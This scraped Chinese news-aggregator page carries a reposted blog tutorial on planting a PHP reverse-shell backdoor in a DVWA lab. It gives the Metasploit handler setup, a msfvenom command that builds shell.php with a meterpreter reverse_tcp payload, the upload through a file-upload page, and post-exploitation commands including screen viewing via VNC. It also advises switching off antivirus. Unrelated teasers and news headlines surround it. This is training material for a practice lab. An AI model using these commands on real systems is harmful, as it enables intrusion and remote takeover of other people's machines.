c盘清理的步骤是什么(如何清理C盘空间)
如何清理C盘空间怎么清理C盘的垃圾文件?每天上网会给电脑带来很多临时文件,这些垃圾文件不清理掉时间久了就会影响到电脑的运行速度。那怎
2022/12/08
【世界快播报】PHP后门反弹演示
2023-01-14 19:18:46 来源:51CTO博客
准备
一台kali虚拟机一台 win11物理机phpstudy 开启 Nginx和Mysqlphpstudy中已经搭建好DVWA靶场DVWA靶场的安全等级调整值low
注意:
(资料图)
需要将杀毒软件个关了, 否则有提示, 黑客入侵.
开始
使用监控模块, 输入:
use exploit/multi/handler
配置payload
set payload php/meterpreter/reverse_tcp# 接着输入options
设置 lhost 和lport
这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了
set lhost 攻击机的ip
生成php后门执行攻击获得meterpreter
注意: 要新建端口, 在root权限下执行
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R>shell.php
这样在window11左面少就有这个文件了
上传文件
这是我原来的地址: http://dvwa/vulnerabilities/upload/#
这是我要填写的地址: http://dvwa/hackable/uploads/shell.php
出现上图几面说明: 这是正常的, 后门已经上传到了靶机上
获得权限
输入:run # 也可以直接输入 exploit , 都一样
也可能出现 404, 都是正常现象
只要有这两行, 就代表上传的后门生效了
成功啦
获取管理员的名字, 输入:getuid观看屏幕 可以在meterpreter里输入
run vnc
点开文件即可看到自己电脑的画面
手机
-
1
跨省游不再与风险区实施联动管理 旅游出行信心有望逐步修复 2022/11/16 -
1
物管股集体回落 雅生活服务(03319)跌7.12% 2022/11/16 -
1
武汉地铁首列“博物馆专列”上线 2022/05/17 -
1
千年古刹杭州灵隐寺5月17日有序恢复开放 2022/05/17 -
1
【挑战365天正能量速写画】第167期:“紫侠仙子”救助两岁迷路女童 2022/05/17